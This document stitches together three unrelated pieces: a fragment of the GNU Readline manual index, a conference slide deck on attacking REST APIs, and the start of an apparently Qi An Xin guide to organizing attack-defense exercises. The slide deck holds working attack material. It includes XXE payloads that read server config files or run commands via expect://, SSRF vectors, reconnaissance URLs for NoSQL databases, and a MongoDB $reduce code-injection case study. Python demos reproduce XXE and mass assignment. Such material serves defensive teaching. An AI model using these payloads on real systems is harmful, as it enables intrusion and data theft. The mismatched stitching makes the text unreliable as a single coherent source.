rl_insert_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_instream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_invoking_keyseqs . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_invoking_keyseqs_in_map . . . . . . . . . . . . . . . . . 31
rl_kill_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_last_func . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_library_version . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_line_buffer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_list_funmap_names . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_macro_bind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
rl_macro_dumper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
rl_make_bare_keymap . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_make_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_mark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_message. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_modifying . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_named_function. . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_num_chars_to_read . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_numeric_arg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
rl_on_new_line . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_on_new_line_with_prompt . . . . . . . . . . . . . . . . . 32
rl_outstream . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_parse_and_bind. . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_pending_input. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_point . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_possible_completions. . . . . . . . . . . . . . . . . . . . . 42
rl_pre_input_hook. . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_prefer_env_winsize . . . . . . . . . . . . . . . . . . . . . . . 24
rl_prep_term_function . . . . . . . . . . . . . . . . . . . . . . . 25
rl_prep_terminal. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_push_macro_input . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_read_init_file. . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_read_key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_readline_name. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_readline_state. . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
rl_readline_version . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_redisplay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_redisplay_function . . . . . . . . . . . . . . . . . . . . . . . 25
rl_replace_line . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_reset_after_signal . . . . . . . . . . . . . . . . . . . . . . . 40
rl_reset_line_state . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_reset_screen_size . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_reset_terminal. . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_resize_terminal . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_restore_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_restore_state. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_save_prompt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_save_state . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_set_key. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_set_keyboard_input_timeout. . . . . . . . . . . . . . 34
rl_set_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_set_paren_blink_timeout . . . . . . . . . . . . . . . . . 37
rl_set_prompt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_set_screen_size . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_set_signals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
rl_show_char . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_sort_completion_matches . . . . . . . . . . . . . . . . . 47
rl_special_prefixes . . . . . . . . . . . . . . . . . . . . . . . . . 45
rl_startup_hook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_stuff_char . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_terminal_name. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_tty_set_default_bindings . . . . . . . . . . . . . . . . 35
rl_tty_unset_default_bindings. . . . . . . . . . . . . . 35
rl_unbind_command_in_map . . . . . . . . . . . . . . . . . . . 29
rl_unbind_function_in_map . . . . . . . . . . . . . . . . . . 29
rl_unbind_key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_unbind_key_in_map . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_username_completion_function . . . . . . . . . . . 43
rl_variable_bind. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
rl_variable_dumper . . . . . . . . . . . . . . . . . . . . . . . . . . 37
rl_variable_value. . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
S
self-insert (a, b, A, 1, !, ...). . . . . . . . . . . . . 15
set-mark (C-@) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
show-all-if-ambiguous . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
show-all-if-unmodified . . . . . . . . . . . . . . . . . . . . . . . . . . 7
skip-completed-text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
skip-csi-sequence () . . . . . . . . . . . . . . . . . . . . . . . . 19
start-kbd-macro (C-x () . . . . . . . . . . . . . . . . . . . . . 18
T
tab-insert (M-TAB). . . . . . . . . . . . . . . . . . . . . . . . . . . 15
tilde-expand (M-~). . . . . . . . . . . . . . . . . . . . . . . . . . . 18
transpose-chars (C-t) . . . . . . . . . . . . . . . . . . . . . . . 15
transpose-words (M-t) . . . . . . . . . . . . . . . . . . . . . . . 15
U
undo (C-_ or C-x C-u). . . . . . . . . . . . . . . . . . . . . . . . . 18
universal-argument () . . . . . . . . . . . . . . . . . . . . . . . 17
unix-filename-rubout () . . . . . . . . . . . . . . . . . . . . . 16
unix-line-discard (C-u) . . . . . . . . . . . . . . . . . . . . . 16
unix-word-rubout (C-w) . . . . . . . . . . . . . . . . . . . . . . 16
upcase-word (M-u) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
V
vi-editing-mode (M-C-j) . . . . . . . . . . . . . . . . . . . . . 19
visible-stats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Y
yank (C-y) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
yank-last-arg (M-. or M-_) . . . . . . . . . . . . . . . . . . 14
yank-nth-arg (M-C-y) . . . . . . . . . . . . . . . . . . . . . . . . 14
yank-pop (M-y) . . . . . . . . . . . . . . . . . . . . . . . 17
RESTing On Your Laurels Will Get
You Pwned
By Abraham Kang, Dinis Cruz, and
Alvaro Muñoz
Goals and Main Point
• Originally a 2-hour presentation, so we will only be
focusing on identifying remote code execution and
data exfiltration vulnerabilities through REST APIs.
• Remember that a REST API is nothing more than a web
application which follows a structured set of rules.
– So all of the previous application vulnerabilities still apply:
SQL Injection, XSS, Direct Object Reference, Command
Injection, etc.
• If you have both publicly exposed and internal REST
APIs then you probably have some remote code
execution and data exfiltration issues.
Causes of REST Vulnerabilities
• Location in the trusted network of your data center
• History of REST Implementations
• Self describing nature
• Input types and interfaces
• URLs to backend REST APIs are built with
concatenation instead of URIBuilder (Prepared URI)
• Inbred Architecture
• Extensions in REST frameworks that enhance
development of REST functionality
• Reliance on incorrectly implemented protocols
(SAML, XML Signature, XML Encryption, etc.)
• Incorrect assumptions of application behavior
Application Architecture Background
[Diagram: parallel Internet-facing silos (FW, Internet, browser host BH1–BH5, FW, app server AS1–AS5) backed by Oracle, SAP, ERP, and MS SQL, plus shared EAI/EII/ESB middleware and Mongo, Couch, Neo4j, Cassandra, LDAP/AD, and HBase stores. HTTP and proprietary protocols are drawn in different colors.]
Internal Network of a Data Center
What are the characteristics of an Internal Network (BlueNet, GreenNet, Trusted Network)?
[Diagram: the same backend systems (AS1–AS5, SAP, ERP, Oracle, MS SQL, EAI/EII/ESB, Mongo, Couch, Neo4j, Cassandra, LDAP/AD, HBase) with the Internet-facing firewalls removed.]
Internal Network of a Data Center
What are the characteristics of an Internal Network (BlueNet, GreenNet, Trusted Network)?
• Connectivity Freedom (within the trusted network)
• Increased Physical Safeguards
• Hardened Systems at the OS level
• Shared Services and Infrastructure
[Diagram: the same internal-network systems as on the previous slide.]
REST History
• Introduced to the world in a PhD dissertation by Roy Fielding in 2000.
• Promoted the idea of using HTTP methods
(PUT, POST, GET, DELETE) and the URL itself to
communicate additional metadata as to the
nature of an HTTP request.
– PUT = Update
– POST = Insert
– GET = Select
– DELETE = Delete
• Allowed the mapping of DB interactions on top of self
descriptive URLs
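The verb-to-CRUD mapping above can be sketched as a minimal dispatch table. This is an illustration only, not code from the deck; the function and resource names are made up:

```python
# The REST verb-to-CRUD mapping described above, as a minimal dispatch table.
CRUD = {
    "PUT": "UPDATE",     # update an existing resource
    "POST": "INSERT",    # create a new resource
    "GET": "SELECT",     # read a resource
    "DELETE": "DELETE",  # remove a resource
}

def describe(method, resource):
    """Translate an HTTP request into the database operation it maps to."""
    return f"{CRUD[method]} on {resource}"

print(describe("GET", "/customers/42"))  # SELECT on /customers/42
print(describe("POST", "/customers"))    # INSERT on /customers
```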
REST History (con’t)
• When REST originally came out, it was harshly
criticized by the security community as being
inherently unsafe.
– As a result, REST applications were originally
developed to only run on internal networks (non-public access).
• This allowed developers to develop REST APIs in a kind
of “Garden of Eden”
– This also encouraged REST to become a popular
interface for internal backend systems.
– Once developers got comfortable with internal REST
applications, they began RESTifying all publicly
exposed application interfaces
Attacking Backend Systems (Old School)
[Diagram: the Internet-facing architecture from the earlier slide, with an Attacker on the Internet probing the public stacks in front of SAP, Oracle, ERP, and MS SQL. HTTP and proprietary protocols are drawn in different colors.]
Attacking An Internal Network (Old School)
• Pwn the application server
• Figure out which systems are running on the internal network and target a data rich server (Port Scanning and Fingerprinting).
• Install client protocol binaries to the targeted system (in this case SAP client code) so you can connect to the system.
• Figure out the correct parameters to pass to the backend system by sniffing the network, reusing credentials, using default userids and passwords, bypassing authentication, etc.
[Diagram: the internal network with the compromised app server highlighted; legend: X = non-compromised machine, Y = compromised/pwned machine.]
Attacking An Internal Network (REST style)
• Find an HTTP proxy in the publicly exposed Application/REST API or get access to curl on a compromised system in the internal network
• Figure out which systems are running on the internal network and target a data rich server (Port Scanning and Fingerprinting is easier because the REST protocol is self-describing)
• Exfiltrate data from the REST interface of the backend system and pass the correct parameters by sniffing the network, reusing credentials, using default userids and passwords, bypassing authentication, reading server logs to find apiKeys, etc.
[Diagram: the public REST API in front of internal REST APIs for SAP, Oracle, Mongo, Couch, Neo4j, Cassandra, and HBase; legend: X = non-compromised machine, Y = affected machine.]
REST is Self Describing
• What URL would you first try when gathering
information about a REST API and the system
that backs it?
REST is Self Describing
• What URL would you first try when gathering
information about a REST API and the system that
backs it?
– http://host:port/
• Compare this to:
– Select * from all_tables (in Oracle)
– sp_msforeachdb 'select "?" AS db, * from [?].sys.tables' (SQL Server)
– SELECT DISTINCT TABLE_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE
COLUMN_NAME IN ('columnA','ColumnB') AND
TABLE_SCHEMA='YourDatabase'; (MySQL)
– Etc.
Especially for NoSQL REST APIs
• All of the following DBs have REST APIs which
closely follow their database object structures
– HBase
– Couch DB
– Mongo DB
– Cassandra.io
– Neo4j
HBase REST API
• Find the running HBase version:
– http://host:port/version
• Find the nodes in the HBase Cluster:
– http://host:port/status/cluster
• Find all the tables in the HBase Cluster:
– http://host:port/
Returns: customer and profile
• Find a description of a particular table’s
schema(pick one from the prior link):
– http://host:port/profile/schema
Couch DB REST API
• Find all databases in the Couch DB:
– http://host:port/_all_dbs
• Find all the documents in the Couch DB:
– http://host:port/{db_name}/_all_docs
Neo4j REST API
• Find version and extension information in the
Neo4j DB:
– http://host:7474/db/data/
Mongo DB REST API
• Find all databases in the Mongo DB:
– http://host:port/
– http://host:port/api/1/databases
• Find all the collections under a named
database ({db_name}) in the Mongo DB:
– http://host:port/api/1/database/{db_name}/collections
Cassandra.io REST API
• Find all keyspaces in the Cassandra.io DB:
– http://host:port/1/keyspaces
• Find all the column families in the
Cassandra.io DB:
– http://host:port/1/columnfamily/{keyspace_name}
REST Input Types and Interfaces
• Does anyone know what the main input types
are to REST interfaces?
REST Input Types and Interfaces
• Does anyone know what the main input types
are to REST interfaces?
– XML and JSON
XML Related Vulnerabilities
• When you think of XML--what vulnerabilities
come to mind?
XML Related Vulnerabilities
• When you think of XML--what vulnerabilities
come to mind?
– XXE (eXternal XML Entity Injection) / SSRF (Server
Side Request Forgery)
– XSLT Injection
– XDOS
– XML Injection
– XML Serialization
XXE (File Disclosure and Port Scanning)
• Most REST interfaces take raw XML to de-serialize into
method parameters of request handling classes.
• XXE Example when the name element is echoed back in
the HTTP response to the posted XML which is parsed
whole by the REST API:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Customer [<!ENTITY y SYSTEM "../WEB-INF/web.xml"> ]>
<Customer>
<name>&y;</name>
</Customer>
*See Attacking <?xml?> processing by Nicolas Gregoire
(Agarri)
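The payload above works against whatever XML parser the REST API happens to use. As a language-neutral sketch, the same file-disclosure behavior can be reproduced with Python's standard-library SAX parser when external general entities are (unsafely) enabled; here secret.txt stands in for ../WEB-INF/web.xml, and all file names are made up for the demo:

```python
import os
import tempfile
import xml.sax
import xml.sax.handler

class TextCollector(xml.sax.ContentHandler):
    """Collects all character data seen by the parser."""
    def __init__(self):
        super().__init__()
        self.chunks = []
    def characters(self, data):
        self.chunks.append(data)

def parse_unsafely(path):
    parser = xml.sax.make_parser()
    # The dangerous setting: resolve external general entities (XXE).
    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(path)
    return "".join(handler.chunks)

workdir = tempfile.mkdtemp()
with open(os.path.join(workdir, "secret.txt"), "w") as f:
    f.write("db_password=hunter2")  # stands in for ../WEB-INF/web.xml

payload = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE Customer [<!ENTITY y SYSTEM "secret.txt">]>\n'
    "<Customer><name>&y;</name></Customer>"
)
doc = os.path.join(workdir, "customer.xml")
with open(doc, "w") as f:
    f.write(payload)

leaked = parse_unsafely(doc)
print(leaked)  # the secret file contents come back as the <name> text
```

The defense is the mirror image: leave external entity resolution off (the default in this parser) or disable DTDs entirely.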
XXE Demo
XXE (Remote Code Execution)
• Most REST interfaces take raw XML to de-serialize into
method parameters of request handling classes.
• XXE Example when the name element is echoed back in
the HTTP response to the posted XML which is parsed
whole by the REST API:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Customer [<!ENTITY y SYSTEM "expect://ls"> ]>
<Customer>
<name>&y;</name>
</Customer>
*See XXE: advanced exploitation, d0znpp, ONSEC
How does the expect:// protocol work???
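expect:// is a PHP stream wrapper (from the optional expect extension) that opens a process instead of a file, so "reading" the URL executes the command after the scheme. A hedged sketch of that resolver behavior, using a toy scheme table rather than real PHP internals: if the XML parser resolves external entity SYSTEM ids through such a resolver, SYSTEM "expect://ls" becomes command execution.

```python
import subprocess

def resolve(system_id):
    """Toy stream-wrapper-style resolver: the URL scheme picks the handler.
    An 'expect://' style scheme hands the rest of the URL to a shell."""
    scheme, sep, rest = system_id.partition("://")
    if not sep:
        raise ValueError("not a URL-style system id")
    if scheme == "file":
        with open(rest) as f:  # ordinary file disclosure
            return f.read()
    if scheme == "expect":     # command execution, like PHP's expect://
        out = subprocess.run(rest, shell=True, capture_output=True, text=True)
        return out.stdout
    raise ValueError(f"unsupported scheme: {scheme}")

print(resolve("expect://echo pwned").strip())  # pwned
```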
SSRF
• Anything which looks like a URI/URL in XML is a
candidate for internal network port scanning or data
exfiltration.
• WS-Addressing example:
<To xmlns="http://www.w3.org/2005/08/addressing">http://MongoServer:8000</To>
*See: SSRF vs. Business-critical Applications Part 2:
New Vectors and Connect-Back Attacks by Alexander
Polyakov
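A sketch of why that element is dangerous: a naive WS-Addressing handler extracts the <To> URL and connects to whatever it says without validating the host, so an attacker can point it at internal services. The MongoServer host:port is the deck's example; the actual outbound fetch is left out here.

```python
import xml.etree.ElementTree as ET

WSA = "http://www.w3.org/2005/08/addressing"

def naive_reply_target(soap_header_xml):
    """Extract the WS-Addressing <To> URL exactly as sent by the client.
    A vulnerable service would now open a connection to this URL."""
    element = ET.fromstring(soap_header_xml)
    return element.text.strip()

header = f'<To xmlns="{WSA}">http://MongoServer:8000</To>'
target = naive_reply_target(header)
print(target)  # http://MongoServer:8000 -- attacker-chosen internal host:port
# Mitigation sketch: allow-list schemes and hosts before connecting.
```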
XML Serialization Vulns
• Every REST API allows the raw input of XML to be
converted to native objects. This deserialization
process can be used to execute arbitrary code on
the REST server.
– REST APIs which use XStream and XMLDecoder
were found to have these vulnerabilities
• When XML is directly deserialized to ORM objects
and persisted, an attacker could supply fields
which are externally hidden but present in the
database (i.e., roles). This usually occurs in the
user- or profile-updating logic of a REST API.
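The mass-assignment half of this can be sketched without any particular ORM: a binder that copies every XML element onto the model will happily accept a role field the update form never exposed. Field names here are illustrative only.

```python
import xml.etree.ElementTree as ET

EXPOSED_FIELDS = {"name", "email"}  # what the update form actually offers

def naive_bind(xml_text):
    """Bind every child element straight onto the model dict - the bug."""
    return {child.tag: child.text for child in ET.fromstring(xml_text)}

def safe_bind(xml_text):
    """Whitelist binding: only copy fields the API means to expose."""
    return {k: v for k, v in naive_bind(xml_text).items() if k in EXPOSED_FIELDS}

attack = ("<user><name>mallory</name>"
          "<email>[email protected]</email>"
          "<role>admin</role></user>")

print(naive_bind(attack))  # includes role=admin -- privilege escalation on save
print(safe_bind(attack))   # role silently dropped
```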
XML Serialization Remote Code
Execution – XStream (Demo)
• Alvaro Munoz figured this out
XML Serialization Remote Code
Execution – XMLDecoder(Demo)
XML Serialization Mass Assignment
(Demo)
URLs to backend REST APIs are built
with concatenation instead of
URIBuilder (Prepared URI)
• Most publicly exposed REST APIs turn around
and invoke internal REST APIs using
URLConnections, Apache HttpClient or other
REST clients. If user input is directly
concatenated into the URL used to make the
backend REST request then the application could
be vulnerable to Extended HPPP.
Extended HPPP (HTTP Path & Parameter Pollution)
•
HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and
Luca Carettoni in 2009. It utilized the discrepancy in how duplicate
request parameters were processed to override application specific
default values in URLs. Typically attacks utilized the “&” character to
fool backend services in accepting attacker controlled request
parameters.
•
Extended HPPP utilizes matrix and path parameters as well as path
segment characters to change the underlying semantics of a REST URL
request.
– “#” can be used to remove ending URL characters similar to “--” in SQL
Injection and “//” in JavaScript Injection
– “../” can be used to change the overall semantics of the REST request in
path based APIs (vs query parameter based)
– “;” can be used to add matrix parameters to the URL at different path
segments
– The “_method” query parameter can be used to change a GET request to a
PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)
– Special framework specific query parameters allow enhanced access to
backend data through REST API. The “qt” parameter in Apache Solr
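A minimal sketch of the concatenation bug and the "prepared URI" fix (the internal-api host name is made up): percent-encoding the user-supplied path segment strips "../", ";" and "#" of their URL meaning before the backend request is built.

```python
from urllib.parse import quote

BACKEND = "http://internal-api:8080"  # hypothetical internal REST host

def naive_url(customer_id):
    """Vulnerable: attacker input concatenated straight into the path."""
    return f"{BACKEND}/customers/{customer_id}/orders"

def prepared_url(customer_id):
    """Safer: encode the segment so path, matrix, and fragment chars stay literal."""
    return f"{BACKEND}/customers/{quote(customer_id, safe='')}/orders"

evil = "../admin/users#"
print(naive_url(evil))     # .../customers/../admin/users#/orders  (path rewritten, tail dropped)
print(prepared_url(evil))  # .../customers/..%2Fadmin%2Fusers%23/orders
```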
Extended HPPP (Demo)
Inbred Architecture
• Externally exposed
REST APIs typically use
the same
communication
protocol (HTTP) and
REST frameworks that
are used in internal
only REST APIs.
• Any vulnerabilities
which are present in
the public REST API
can be used against
the internal REST APIs.
[Diagram: a public REST API (Pub REST API) and an SAP REST API (SAP AS5, …) each front multiple internal REST APIs backed by Oracle, Mongo, Couch, Neo4j, Cassandra, HBase, …]
Extensions in REST frameworks that enhance
development of REST functionality
• Turns remote code execution from a security
vulnerability into a feature.
– In some cases it is subtle:
• Passing in partial script blocks used in evaluating the
processing of nodes.
• Passing in JavaScript functions which are used in map-
reduce processes.
– In others it is more obvious:
• Passing in a complete Groovy script which is executed as a
part of the request on the server. Gremlin Plug-in for
Neo4j.
Rest Extensions Remote Code
Execution(Demo)
Reliance on incorrectly implemented
protocols (SAML, XML Signature, XML
Encryption, etc.)
• SAML, XML Signature, XML Encryption can be subverted
using wrapping based attacks.*
See: How to Break XML Encryption by Tibor Jager and Juraj
Somorovsky, On Breaking SAML: Be Whoever You Want to Be
by Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco
Kampmann, and Meiko Jensen, and How To Break XML
Signature and XML Encryption by Juraj Somorovsky (OWASP
Presentation)
Incorrect assumptions of REST
application behavior
• Guidance on implementing security in REST often
prioritizes adherence to REST principles over
security
• REST provides for dynamic URLs and dynamic
resource allocation
Incorrect assumptions of REST
application behavior (Example 1)
• According to many REST authentication guides
on the Internet, an “apiKey” passed as a GET
parameter is the best way to keep track of
authenticated users with stateless sessions.
Incorrect assumptions of REST
application behavior (Example 1)
• According to many REST authentication guides
on the Internet, an “apiKey” passed as a GET
parameter is the best way to keep track of
authenticated users with stateless sessions.
• But HTTP GET Parameters are usually exposed in
proxy logs, browser histories, and HTTP server
logs.
REST provides for dynamic URLs and
dynamic resource allocation
Example Case Study
• You have a MongoDB REST API which exposes two
databases which can only be accessed at /realtime/*
and /predictive/*
• There are two ACLs which protect all access to each
of these databases
<web-resource-name>Realtime User</web-resource-name> <url-
pattern>/realtime/*</url-pattern>
<web-resource-name>Predictive Analysis User</web-resource-name>
<url-pattern>/predicitive/*</url-pattern>
Can anyone see the problem? You should be able to
own the server with minimal disruption to the existing
databases.
Example Case Study Exploit
• The problem is not in the two databases. The
problem is that you are working with a REST API
and resources are dynamic.
• So POST to the following URL to create a new
database called "test", which is accessible at
"/test":
POST http://svr.com:27080/test
• Then POST the following:
POST http://svr.com:27080/test/_cmd
– With the following body:
cmd={…, “$reduce”:”function (obj, prev) {
malicious_code() }” …
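A sketch of how that request body might be assembled. The command structure here is illustrative of this style of Mongo HTTP front end, not an exact product API; `malicious_code()` stands in for attacker-supplied JavaScript:

```python
def build_reduce_payload(js_body: str) -> dict:
    # The "$reduce" value is executed server-side as JavaScript during
    # map-reduce, so a caller-supplied function body is remote code execution.
    return {
        "cmd": {
            "mapreduce": "items",  # hypothetical collection name
            "$reduce": "function (obj, prev) { %s }" % js_body,
        }
    }

payload = build_reduce_payload("malicious_code()")
print(payload["cmd"]["$reduce"])  # function (obj, prev) { malicious_code() }
```

The point is that the server treats the `$reduce` string as code to run, so any string the attacker controls becomes executable.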
REST Attacking Summary
• Attack serialization in the exposed XML/JSON
interfaces to execute remote code
• Attack the proxied requests to backend systems
using Extended HPPP
• Use XXE/SSRF to read local config files, execute
arbitrary code, or port scan and attack other
internal REST exposed applications
• Look for other internal REST APIs through
HATEOAS links in XML responses
• By-pass authentication
Questions
? | pdf |
Practical Attack-Defense Exercises:
Organizing the Exercise from the Purple Team's Perspective
Preface

Practical network attack-defense exercises are an important component of security protection work for critical information systems under the new situation. An exercise typically takes information systems in actual operation as the protection targets and, through supervised attack-defense confrontation, simulates real network attacks to the greatest extent possible, thereby testing the actual security of the information systems and the actual effectiveness of operations and maintenance safeguards.

Since 2016, driven strongly by national regulators, practical network attack-defense exercises have received growing attention: their scope has become wider, their duration longer, and their scale larger. The nationwide exercises organized by the relevant state authorities have expanded from only a few participating organizations in 2016 to more than a hundred by 2019; at the same time, regulators in every province, city, and industry are actively preparing and organizing exercises within their own jurisdictions. Practical attack-defense exercises are blossoming everywhere.

As the scale of the exercises keeps expanding, the technical level and confrontation capabilities of both attackers and defenders have also kept escalating through this contest.

In 2016, exercises were still at an early stage, with attack and defense mostly focused on Internet entry points or intranet boundaries.

In 2017, exercises began to be closely integrated with network security assurance for major events. Judging from the results, direct attacks launched from the Internet side were still generally quite effective; and once a system's outer defenses were breached, lateral movement and cross-domain attacks were usually easy to achieve.

In 2018, exercises began to penetrate into individual industries and localities. With richer exercise experience and the wide application of big-data security technologies, defenders' capabilities to monitor, detect, and trace attack behavior increased substantially; correspondingly, attack teams turned more toward new strategies such as precision attacks and supply-chain attacks.

Since 2019, exercises have received unprecedented attention from regulators, government and enterprise organizations, and security vendors. Professional monitoring and protection technologies such as traffic analysis, EDR, honeypots, and whitelisting have been widely adopted by defense teams. The increased difficulty of attack has in turn forced attack teams to upgrade across the board: advanced techniques such as 0-day exploits, 1-day exploits, identity impersonation, rogue Wi-Fi, spear-phishing email, and watering-hole attacks are no longer rare in exercises, bringing the exercises ever closer to real network combat.

How can one participate better in practical attack-defense exercises? How can one use them to improve one's own security capabilities? These have become important questions for the operators of large government and enterprise organizations.

As a leading domestic network security company, Qi An Xin Group has become a main force in all kinds of practical attack-defense exercises nationwide. Drawing on experience from more than 200 exercises, Qi An Xin's security service team has compiled this series of books, which interpret the essentials of practical attack-defense exercises from the red team, blue team, and purple team perspectives respectively, and explain how government and enterprise organizations can use exercises to improve their security capabilities.

It should be noted that the red-versus-blue confrontation in these exercises borrows the concepts and methods of military exercises; generally speaking, red and blue represent the attacker and the defender respectively. However, there is no strict rule on these definitions, and some actual exercises designate the blue team as the attackers and the red team as the defenders. In this series, following the convention of the great majority of network security practitioners, we uniformly call the attacking side the red team and the defending side the blue team, while the purple team refers to the organization running the exercise.

"Organizing the Exercise from the Purple Team's Perspective" is the third book in this series. It focuses on purple-team work in a practical environment, proposes four stages for organizing a practical attack-defense exercise, presents the organizational elements and organizational forms of an exercise, clarifies the responsibilities of each participating party, describes the key work to be carried out in each stage, and points out the risks that should be avoided when conducting exercises.
Contents

Chapter 1: What Is a Purple Team
  1. Organizational elements of a practical attack-defense exercise
  2. Organizational forms of a practical attack-defense exercise
  3. Keys to organizing a practical attack-defense exercise

Chapter 2: The Four Stages of Organizing a Practical Attack-Defense Exercise
  1. Planning stage
  2. Preparation stage
  3. Exercise stage
  4. Summary stage

Chapter 3: Risk Mitigation Measures for Practical Attack-Defense Exercises
  1. The exercise limits the target systems, not the attack paths
  2. Except where authorized, denial-of-service attacks are not allowed
  3. Notes on web-defacement attacks
  4. Attack methods prohibited in the exercise
  5. Requirements for attackers' use of trojans
  6. Blocking and reporting of illegal attacks

Appendix: Qi An Xin's Experience Organizing Practical Attack-Defense Exercises
Chapter 1: What Is a Purple Team

The purple team generally refers to the organizer of a practical network attack-defense exercise.

In such an exercise, the purple team, acting as the organizer, carries out the overall organization and coordination of the exercise, taking responsibility for exercise organization, process monitoring, technical guidance, emergency support, exercise summary, and recommendations for optimizing technical measures and strategies.

The purple team organizes the red team to attack the real environment and the blue team to defend it. The aim is to use the exercise to test the participating organizations' capabilities in responding to security threats, detecting and discovering attack events, analyzing and assessing events, and responding to and handling events, thereby improving the real-world security capabilities of the organizations under test.

The elements, forms, and key points of the purple team's organization of a practical network attack-defense exercise are introduced in turn below.

1. Organizational elements of a practical attack-defense exercise

Organizing a practical network attack-defense exercise involves four elements: the organizing unit, the exercise technical support unit, the attack teams (the red teams), and the defending units.

The organizing unit is responsible for overall control, resource coordination, exercise preparation, exercise organization, exercise summary, implementation of remediation, and related work.

The exercise technical support unit is a professional security company that provides the corresponding technical support and safeguards, building the attack-defense exercise environment and providing a visual display of the exercise.

The attack teams, i.e. the red teams, are generally fielded independently by several security vendors, each team usually staffed with 3–5 people. Under prior authorization, they carry out penetration attacks mainly through asset reconnaissance, tool-based scanning, and manual penetration, in order to obtain privileges on, and data from, the exercise target systems.

The defending teams, i.e. the blue teams, are composed of personnel from the participating units and security vendors. They are mainly responsible for protecting the assets under the defenders' administration and, during the exercise, for preventing the red teams from obtaining privileges and data as far as possible.

[Diagram — exercise roles: Organizing unit: overall control, resource coordination, expert review, referee scoring. Attack teams: several attack groups launch real network attacks, competitively or cooperatively, to find security vulnerabilities and gain server privileges. Attack-defense exercise platform: visual display; all attack behavior kept safe and controllable; attack screen recording and video surveillance. Defending units: defense groups monitor the network in real time and carry out real-time blocking, incident response, and other work.]

2. Organizational forms of a practical attack-defense exercise

Based on actual needs, practical network attack-defense exercises are organized mainly in the following two forms:

1) Exercises organized by national or industry authorities and regulators

Such exercises are generally organized by public security organs at all levels, cyberspace administration departments at all levels, and national or industry authorities or regulators in government, finance, transportation, health, education, electric power, telecom operators, and similar sectors. Targeting the industry's critical information infrastructure and important systems, they organize attack teams together with the enterprises and institutions in the industry to conduct practical network attack-defense exercises.

2) Exercises organized by large enterprises and institutions themselves

Central state-owned enterprises, banks, financial firms, telecom operators, administrative bodies, public institutions, and other government and enterprise organizations organize attack teams together with their units to conduct practical attack-defense exercises, in order to validate the effectiveness of their business security defense systems.

3. Keys to organizing a practical attack-defense exercise

